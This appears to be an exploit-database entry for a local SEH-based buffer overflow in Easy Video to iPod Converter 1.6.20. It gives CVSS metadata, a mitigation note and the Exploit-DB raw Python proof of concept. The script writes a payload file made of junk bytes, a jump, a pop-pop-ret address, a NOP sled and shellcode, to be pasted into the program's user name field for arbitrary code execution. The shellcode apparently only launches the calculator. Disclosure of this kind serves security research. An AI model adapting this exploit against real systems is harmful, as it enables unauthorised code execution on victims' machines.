Easy Video to iPod Converter - Local Buffer Overflow (SEH)

vendor:

Easy Video to iPod Converter

by:

Nawaf Alkeraithe

7.8

CVSS

HIGH

Buffer Overflow

119

CWE

Product Name: Easy Video to iPod Converter

Affected Version From: 1.6.20

Affected Version To: 1.6.20

Patch Exists: Yes

Related CWE: N/A

CPE: a:divxtodvd:easy_video_to_ipod_converter

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Windows XP SP3 x86

2019

Easy Video to iPod Converter – Local Buffer Overflow (SEH)

Easy Video to iPod Converter is vulnerable to a local buffer overflow vulnerability. By entering a specially crafted payload into the 'Enter User Name' field, an attacker can execute arbitrary code on the vulnerable system. The payload consists of 996 A's, followed by a jump instruction, a pop pop ret address, 20 NOPs, and a shellcode.

Mitigation:

Update to the latest version of Easy Video to iPod Converter.

Source

Exploit-DB raw data:

# Exploit Title: Easy Video to iPod Converter - Local Buffer Overflow (SEH)
# Date: 2019-01-26
# Exploit Author: Nawaf Alkeraithe
# Twitter: @Alkeraithe1
# Vulnerable Software: Easy Video to iPod Converter 1.6.20
# Vendor Homepage: http://www.divxtodvd.net/
# Version: 1.6.20 
# Software Link: http://www.divxtodvd.net/easy_video_to_ipod.exe
# Tested Windows XP SP3 x86

# PoC Steps
#1- run the program
#2- click on "Register"
#3- In the "Enter User Name" field, past the content of the payload, and click "OK"


junk = "A"*996
jmp = "\xEB\x06\x90\x90"
popPopRetAddr = "\x11\x7B\x03\x10"
NOPs = "\x90"*20;
shellCode = "\x31\xC9\x51\x68\x63\x61\x6C\x63\x54\xB8\xC7\x93\xC2\x77\xFF\xD0"

payload = junk + jmp + popPopRetAddr + NOPs + shellCode

exploitText = open("exploit.txt","w")
exploitText.write(payload)
exploitText.close()